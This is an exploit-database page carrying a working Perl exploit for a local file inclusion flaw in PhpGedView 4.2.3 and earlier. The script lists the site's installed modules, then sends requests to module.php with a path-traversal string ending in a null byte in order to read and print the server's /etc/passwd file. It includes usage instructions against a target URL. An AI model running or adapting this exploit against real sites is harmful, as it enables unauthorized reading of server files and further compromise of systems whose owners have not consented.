PhpGedView 4.2.3 Local File Inclusion

2011.01.06
Credit: dun
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl -w # :::::::-. ... ::::::. :::. # ;;, `';, ;; ;;;`;;;;, `;;; # `[[ [[[[' [[[ [[[[[. '[[ # $$, $$$$ $$$ $$$ "Y$c$$ # 888_,o8P'88 .d888 888 Y88 # MMMMP"` "YmmMMMM"" MMM YM # [ Discovered by dun \ posdub[at]gmail.com ] # ################################################################## # [ PhpGedView <= 4.2.3 ] Local File Inclusion Vulnerability # ################################################################## # # Script: "PhpGedView is a revolutionary genealogy program which # allows you to view and edit your genealogy on your website..." # # Script: http://www.phpgedview.net/ # Download: http://sourceforge.net/projects/phpgedview/ # # Usage: perl expl.pl http://site.com/phpgedview/ # ################################################################## #[ dun / 2011-01-05 ] use IO::Socket; use Socket; use IO::Select; my @modules; if(scalar(@ARGV) < 1) { print "\nUsage: perl expl.pl http://site.com/phpgedview/\n\n"; exit; } print "\033[32m[1] \033[0mChecking installed PGV modules..\n"; @modules=get_modules_list($ARGV[0].'/modules/'); print "\033[32m[2] \033[0mTrying to read /etc/passwd file..\n"; p(\@modules, $ARGV[0].'/', '/etc/passwd'); sub http_query { my $page=""; my $url=$_[0]; my $ua="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"; if(defined($_[1]) && defined($_[2])) { $host=$_[1]; $port=$_[2]; $get="GET $url HTTP/1.0\r\n$ua\r\nConnection: Close\r\n\r\n"; } else { $port=80; $url=~s/http:\/\///; $host=$url; $query=$url; $host=~s/([a-zA-Z0-9\.]+)\/.*/$1/; $query=~s/$host//; if ($query eq "") {$query="/";}; $get="GET $query HTTP/1.0\r\nHost: $host\r\n$ua\r\nConnection: Close\r\n\r\n"; } my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"$port",Proto=>"tcp",Timeout => 3) or return; print $sock $get; my @r = <$sock>; $page="@r"; close($sock); return $page; } sub get_modules_list { my $host = $_[0]; my $page=""; my @modules1=( "FCKeditor", "GEDFact_assistant", "JWplayer", "batch_update", "cms_interface", "gallery2", "googlemap", "lightbox", "punbb", "research_assistant", "sitemap", "slideshow", "wordsearch" ); $page = http_query($host); while($page =~ m/(.*)<(a|A)\s(href|HREF)="([^\/]+)\/">/g){ push (@modules2, $4); } if(@modules2) { print " Installed modules: @modules2\n"; return @modules2; } else { print " No info about installed modules..\n"; return @modules1; } } sub p { my($mods, $host, $file)=@_; my $page=""; foreach $r(@{$mods}) { $q="$host"."module.php?mod=$r&pgvaction=".("/.."x10)."$file%00"; $page=http_query($q); @lines = split (/\n/, $page); if($page=~ m/(.+):.:\d+:\d+:(.*):\/(.+):\/(.*)/g){ print "\033[32mModule: $r\n"; print "Adress: $q\n"; print "File: /etc/passwd:\033[0m (Press ENTER) "; if(<STDIN>) { print "\n\n"; for(@lines) { if($_=~ m/(.+):.:\d+:\d+:(.*):\/(.+):\/(.*)/g){ print $_."\n"; } } } return 0; } } print "\033[31mFailed :(\033[0m\n" } ##################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top